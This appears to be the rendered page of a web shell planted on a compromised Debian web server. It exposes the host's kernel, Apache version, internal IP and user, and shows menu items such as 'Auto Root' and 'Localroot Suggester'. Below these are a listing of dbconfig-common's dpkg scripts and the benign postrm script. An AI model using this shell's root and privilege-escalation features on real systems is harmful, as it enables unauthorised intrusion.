Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
dbconfig-common /
dpkg /
Delete
Unzip
Name
Size
Permission
Date
Action
common
38.78
KB
-rw-r--r--
2023-02-16 12:37
config
22.86
KB
-rw-r--r--
2023-02-16 12:37
config.mysql
68
B
-rw-r--r--
2023-02-16 12:37
config.pgsql
69
B
-rw-r--r--
2023-02-16 12:37
config.sqlite3
71
B
-rw-r--r--
2023-02-16 12:37
frontend.config
61
B
-rw-r--r--
2023-02-16 12:37
frontend.config.mysql
67
B
-rw-r--r--
2023-02-16 12:37
frontend.config.pgsql
67
B
-rw-r--r--
2023-02-16 12:37
frontend.postinst
63
B
-rw-r--r--
2023-02-16 12:37
frontend.postinst.mysql
69
B
-rw-r--r--
2023-02-16 12:37
frontend.postinst.pgsql
69
B
-rw-r--r--
2023-02-16 12:37
frontend.postrm
61
B
-rw-r--r--
2023-02-16 12:37
frontend.postrm.mysql
67
B
-rw-r--r--
2023-02-16 12:37
frontend.postrm.pgsql
67
B
-rw-r--r--
2023-02-16 12:37
frontend.preinst
62
B
-rw-r--r--
2023-02-16 12:37
frontend.preinst.mysql
68
B
-rw-r--r--
2023-02-16 12:37
frontend.preinst.pgsql
68
B
-rw-r--r--
2023-02-16 12:37
frontend.prerm
60
B
-rw-r--r--
2023-02-16 12:37
frontend.prerm.mysql
66
B
-rw-r--r--
2023-02-16 12:37
frontend.prerm.pgsql
66
B
-rw-r--r--
2023-02-16 12:37
postinst
20.29
KB
-rw-r--r--
2023-02-16 12:37
postinst.mysql
70
B
-rw-r--r--
2023-02-16 12:37
postinst.pgsql
70
B
-rw-r--r--
2023-02-16 12:37
postinst.sqlite3
72
B
-rw-r--r--
2023-02-16 12:37
postrm
986
B
-rw-r--r--
2023-02-16 12:37
postrm.mysql
68
B
-rw-r--r--
2023-02-16 12:37
postrm.pgsql
68
B
-rw-r--r--
2023-02-16 12:37
postrm.sqlite3
70
B
-rw-r--r--
2023-02-16 12:37
preinst
431
B
-rw-r--r--
2023-02-16 12:37
preinst.mysql
69
B
-rw-r--r--
2023-02-16 12:37
preinst.pgsql
70
B
-rw-r--r--
2023-02-16 12:37
preinst.sqlite3
71
B
-rw-r--r--
2023-02-16 12:37
prerm
5.68
KB
-rw-r--r--
2023-02-16 12:37
prerm.mysql
67
B
-rw-r--r--
2023-02-16 12:37
prerm.pgsql
67
B
-rw-r--r--
2023-02-16 12:37
prerm.sqlite3
69
B
-rw-r--r--
2023-02-16 12:37
Save
Rename
# -*- mode: sh -*- ### ### source common stuff ### dbc_go(){ . /usr/share/dbconfig-common/dpkg/common local cfg _dbc_debug "(postrm) dbc_go() $@" dbc_config "$@" || return $? if [ "$dbc_command" = "upgrade" ]; then ## With dbconfig-no-thanks installed we don't need to do anything. if dbc_no_thanks ; then return 0 fi dbc_read_package_config || return $? dbc_preseed_package_debconf || return $? elif [ "$dbc_command" = "purge" ]; then # remove the dbc configuration file rm -f /etc/dbconfig-common/$dbc_package.conf || true if command -v ucf >/dev/null; then cfg="/etc/dbconfig-common/$dbc_package.conf" ucf -p "$cfg" || true ucfr -p "$dbc_package" "$cfg" fi # forget everything we ever knew related to debconf+dbc for t in $dbc_register_templates; do db_unregister $dbc_package/$t || true done fi }